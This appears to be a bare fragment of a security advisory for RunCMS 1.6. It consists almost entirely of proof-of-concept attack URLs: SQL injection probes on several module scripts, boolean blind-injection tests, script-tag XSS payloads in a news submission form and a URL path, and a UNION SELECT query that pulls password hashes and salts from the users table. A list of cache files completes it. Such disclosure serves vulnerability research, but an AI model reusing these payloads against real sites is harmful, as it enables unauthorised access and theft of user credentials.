http://[server]/[installdir]/modules/mydownloads/brokenfile.php?lid+DSecRG_INJECTION http://[server]/[installdir]/modules/mydownloads/visit.php?lid=2+DSecRG_INJECTION http://[server]/[installdir]/modules/mydownloads/ratefile.php?lid=2+DSecRG_INJECTION http://[server]/[installdir]/modules/mylinks/ratelink.php?lid=2+DSecRG_INJECTION http://[server]/[installdir]/modules/mylinks/modlink.php?lid=2+DSecRG_INJECTION http://[server]/[installdir]/modules/mylinks/brokenlink.php?lid=2+DSecRG_INJECTION
GET http://[server]/[installdir]/modules/mydownloads/brokenfile.php?lid=1+and+1=1 HTTP/1.0
GET http://[server]/[installdir]/modules/mydownloads/brokenfile.php?lid=1+and+1=0 HTTP/1.0
POST http://[server]/[installdir]/modules/news/submit.php HTTP/1.0 subject=<script>alert("DSecRG_XSS")</script>
http://[server]/[installdir]/modules/news/index.php/"><script>alert('DSecRG_XSS')</script>
runcms_1.6\modules\sections\cache\intro.php runcms_1.6\modules\mylinks\cache\disclaimer.php runcms_1.6\modules\mydownloads\cache\disclaimer.php runcms_1.6\modules\newbb_plus\cache\disclaimer.php runcms_1.6\modules\system\cache\disclaimer.php runcms_1.6\modules\system\cache\footer.php runcms_1.6\modules\system\cache\header.php runcms_1.6\modules\system\cache\maintenance.php
http://site.com/public/modules/downloads/ratefile.php?lid={number}">[XSS code]
http://site.ru/modules/sections/index.php?op=viewarticle&artid=1+and+1=0+union+select+1,2,pass,4,5,pwdsalt, 7,8,9,10+from+runcms_users+where+uid=2